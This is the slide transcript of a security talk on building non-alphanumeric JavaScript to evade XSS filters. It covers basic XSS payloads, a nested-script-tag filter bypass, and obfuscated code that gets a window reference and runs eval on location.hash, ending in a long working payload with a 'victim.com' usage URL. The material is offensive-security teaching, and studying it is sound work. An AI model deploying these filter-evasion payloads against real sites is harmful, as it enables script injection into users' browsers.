Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Writing java script without numbers or letters

836 views

Published on

Writing java script without numbers or letters old fun topic

Published in: Technology
  • Be the first to comment

Writing java script without numbers or letters

  1. 1. The Great JavaScript wall.
  2. 2.   But the condition is you can't use numbers or letters
  3. 3. ⦿Real life scenario: XSS filter blocks alphanumeric. ⦿Can defeat XSS filters. ⦿May not be easily detected ⦿The smartest answer is simply because we can.
  4. 4. $ whoami   $ Nahidul Kibria @nahidupa   Synack Red Team, Co-Leader, OWASP Bangladesh Chapter, Principal Software Engineer - Orbitax Bangladesh Ltd. Writing code for fun and food. Security enthusiastic.
  5. 5. HTML and JavaScript are live side by side So if user insert malicious JavaScript that will execute in client side
  6. 6. Request: http://www.example.com/?name=<script>alert('XSS')</script> Response: <html> <body> <p>Hello <script>alert('XSS')</script></p> </body> </html>
  7. 7. ⦿ ASP.NET built-in protection. ⦿ Microsoft Anti XSS. ⦿ Anti Samy ⦿ Mod security ⦿ Angular $sanitize
  8. 8. ⦿ Goal: • Remove all scripts from untrusted HTML ⦿ Challenges: • Many HTML features that allow scripting • Proprietary extensions to HTML ●<svg> • Parsing invalid HTML (Browser support this) • Browser bugs
  9. 9. ⦿ Script tags • <script src="http://www.example.com/xss.js"> ⦿ Event handler attributes • <body onload="alert('XSS')"> ⦿ CSS • <p style="background:url('javascript:alert(1)')"> ⦿ URLs • <img src="javascript:alert('XSS')">
  10. 10. ⦿ • String matching filters ⦿ • HTML DOM parsers ⦿ • Canonicalization ⦿ • Whitelisting
  11. 11. Remove all script tags: s/<script>//g; Bypasses: ▪ Invalid HTML accepted by browsers ▪ Encoding of attribute values and URLs ▪ Using the filter against itself: ▪ <scr<script>ipt> ▪ Incomplete blacklists
  12. 12. <body onload="alert(1)"> <script>alert(2)</script> <p>Hello</p> </body>
  13. 13. ⦿ Getting window reference. ⦿ Directly ‘window’ are blacklisted in XSS filter. ⦿ Why we are interest in ‘window’ ⦿ Window reference give you more opportunity. Like ⦿ Open popup ⦿ Redirect “window.location” ⦿ Read write window title and a lots
  14. 14. ⦿ //all browsers ⦿ window; ⦿ self; ⦿ open().opener; ⦿ Date.constructor('return this')() ⦿ document.documentElement.ownerDocument.defaul tView ⦿ x=''.split,x(null) ⦿ __proto__.__parent_ ⦿ (function(){}).__proto__.__parent__
  15. 15. Numbers or letters not allowed ⦿ So we first try to get a window reference . ⦿ Then for POC just show a window.alert(1) ⦿ Lets try to write code x=[].sort,so x(1); Any Idea?
  16. 16. ⦿ Variables name can be Unicode or certain symbols • _ , $, ٥, ੫, ੪, ૨, ୩, ୫, ୬, ୯ etc.. ⦿ Dynamically weak type,can freely type convert  • var x=+'2'; //string • x= x+1; //x!3 //integer ⦿ arrays and objects become strings in concatenations  • x=[1]+[true] //x ! '1true' • x=1+true // x ! 2 ⦿ strings can be treated as arrays of letters  • x='test' //x[0] ! 't‘ x[1] ! 'e' x[2] ! 's' x[3] ! 't' ⦿ Array notation can be used for methods/properties  • x=window['alert'];   //x(1) ! window
  17. 17. !0 ! true !1 ! false !'anystring' ! false !'' ! true ![] ! false !{} ! false +false ! 0 +true ! 1 +'' ! 0 +'any' ! NaN +[] ! 0 +{} ! NaN ''+false ! 'false‘ '+true ! 'true‘ ''+{} ! '[object object]'
  18. 18. ❑+[]==+’’==0 ❑var °=+[]; // °==0 ❑a=++º ; //a == 1 ,º == 1 ❑b=º++; //b == 1 ,º == 2 ❑c=º;  //c == 2; ❑d=º/º; //d == 1 ❑e=-º ; //e == -2 ❑f=~º ; //f == -3 ❑g=º*º; //g == 4

  19. 19. var _=''; //!_==true ,{} =[object object] ➢Ø=!_+{}; // Ø =='true[object object]' ➢f=!Ø+_; //f=='false‘ ➢º=+_; //º==0 ❑Ţ=Ø[º]; // Ţ=='t'
 ❑ℝ=Ø[++º]; //ℝ=='r' º==1
 ❑Ŝ=f[º+++º]; //Ŝ==s, º==2
 ❑Ò=Ø[º+++º] // Ò == 'o' º==3
  20. 20. var _=''; //!_==true ,{} =[object object] ➢Ø=!_+{}; // Ø =='true[object object]' ➢f=!Ø+_; //f=='false‘ ➢º=+_; //º==0 ❑Ţ=Ø[º]; // Ţ=='t'
 ❑ℝ=Ø[++º]; //ℝ=='r' º==1
 ❑Ŝ=f[º+++º]; //Ŝ==s, º==2
 ❑Ò=Ø[º+++º] // Ò == 'o' º==3
  21. 21. ❑ Ŝ+Ò+ ℝ+Ţ=='sort‘ ❑ [][Ŝ+Ò+ ℝ+Ţ]==[].sort ❑ [a=1,b=1] [Ŝ+Ò+ ℝ+Ţ]==[].sort ❑ [_='', Ø=!_+{}, f=!Ø+_, º=+_, Ţ=Ø[º], ℝ=Ø[++º], Ŝ=f[º++º], Ò=Ø[º++º] ] [Ŝ+Ò+ ℝ+Ţ]==[].sort 

  22. 22. ❑ so we have window now what? ❑ To get eval we need a "v" ' '+([].sort)->'function sort(){native code] }' ❑ But getting some letters can be difficult perhaps even impossible.  ❑ true,false and object  only provide 12 letters  ❑ ''+1/0->Infinity' //gives 'n' ❑ /./['constructor'] //Gives 'p' ❑ String.formCharCode requres an 'h','c' ❑ What if we could load code from elsewhere? ❑ window.name ❑ location.hash
  23. 23. ❑ Window.name='alert(1)' ❑ window['eval'](window['name']) ❑ window.name='javascript:alert(1)' ❑ window[location']=window['name'] ❑ By the way getting 'm' can take a lot code ❑ http://url/#javascript:aler(1) ❑ window['location']=window[location']['hash'] ❑ but getting hash require 'h'
  24. 24. ❑ æ=window,_='location ❑ http://url/#javascript:alert(1)
 æ[_]=æ['eval']('/*'+æ[_]) ❑ http://uri/#*/alert(1)//eval
 æ[_]=æ[($='/*'+æ[_])['slice'](-4)]($)
  25. 25. ❑ In firefox Only executing alert(1) ❑   ❑ first idea : 472 character ❑ latest entry: 63 character ❑   ❑ first for arbitrary code no btoa : 154 ❑ latest for arbitrary code no btoa 103 ❑   ❑ first arbitrary code cross browser 240 ❑ latest arbitrary code cross browser 160 
  26. 26. ❑ So far we have assign variables and used Unicode character look like letters. ❑ but if we build each part of string from scratch we don't even need variables names. ❑ what's the smallest set of characters required to execute arbitrary javascript?
  27. 27. ❑ First attempt 8 characters: []+,!()/❑ ([],[][(![]+[])[!![]+!![]+!![]]+(/,/[(!![]+[])[+![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+![]]]+[])[!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[]) [+!![]]+(!![]+[])[+![]]])()[(!![]+[])[!![]+!![]+!![]]+(/,/[(!![]+[])[+![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+![]]]+[])[!![]+!![]+[]+(!![] +!![]+!![]+!![]+!![]+!![]+!![])]+(![]+[])[+!![]]+(![]+[])[!![]+!![]]](([]+([],[][(![]+[])[!![]+!![]+!![]]+(/,/[(!![]+[])[+![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![] +!![]+!![]]+(!![]+[])[+![]]]+[])[!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+![]]])()[(![]+[])[!![]+!![]]+(/,/[(!![]+[])[+![]]+(!![]+[])[!![]+!![]+!! []]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+![]]]+[])[!![]+!![]+!![]+!![]+!![]+!![]]+(/,/[(!![]+[])[+![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+! []]]+[])[!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+![]]+([][+[]]+[])[!![]+!![]+!![]+!![]+!![]]+(/,/[(!![]+[])[+![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!! []]+(!![]+[])[+![]]]+[])[!![]+!![]+!![]+!![]+!![]+!![]]+([][+[]]+[])[+!![]]])[(![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]]+([][+[]]+[])[!![]+!![]+!![]+!![]+!![]]+ (/,/[(!![]+[])[+![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+![]]]+[])[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]]]((+!![]/+([]+(+!![])+(+!![])+ (+!![])+(+!![])+(+!![])+(+!![])+(+!![]))+[])[(+!![])+[]+(!![]+!![]+!![]+!![]+!![]+!![]+!![])]+(!![]+!![]))+([],[][(![]+[])[!![]+!![]+!![]]+(/,/[(!![]+[])[+![]]+(!! []+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+![]]]+[])[!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+![]]])()[(![]+[])[!![]+!![]]+(/,/[(!![] +[])[+![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+![]]]+[])[!![]+!![]+!![]+!![]+!![]+!![]]+(/,/[(!![]+[])[+![]]+(!![]+[])[!![]+!![]+!![]]+(![] +[])[!![]+!![]+!![]]+(!![]+[])[+![]]]+[])[!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+![]]+([][+[]]+[])[!![]+!![]+!![]+!![]+!![]]+(/,/[(!![]+[])[+![]]+(!![]+[])[!![] +!![]+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+![]]]+[])[!![]+!![]+!![]+!![]+!![]+!![]]+([][+[]]+[])[+!![]]]) 
   Execute: eval((''+location).slice(-2)+location) Use with : http://www.victim.com/#"alert(1)//"
  28. 28. ⦿ Reduced 7 character sets: []+,!() 6 character sets: ❑ []+!() ❑ []+=() ❑ []+=/_ ⦿ and that’s the wall  • always require []+ • Allows you to generate undefined,Infinity.NaN
  29. 29. Learn from Internet...Some real masters are   joey Tyson Gareth Heyes LeverOne David Lindsay
  30. 30. ⦿ If you have no question Thanks

×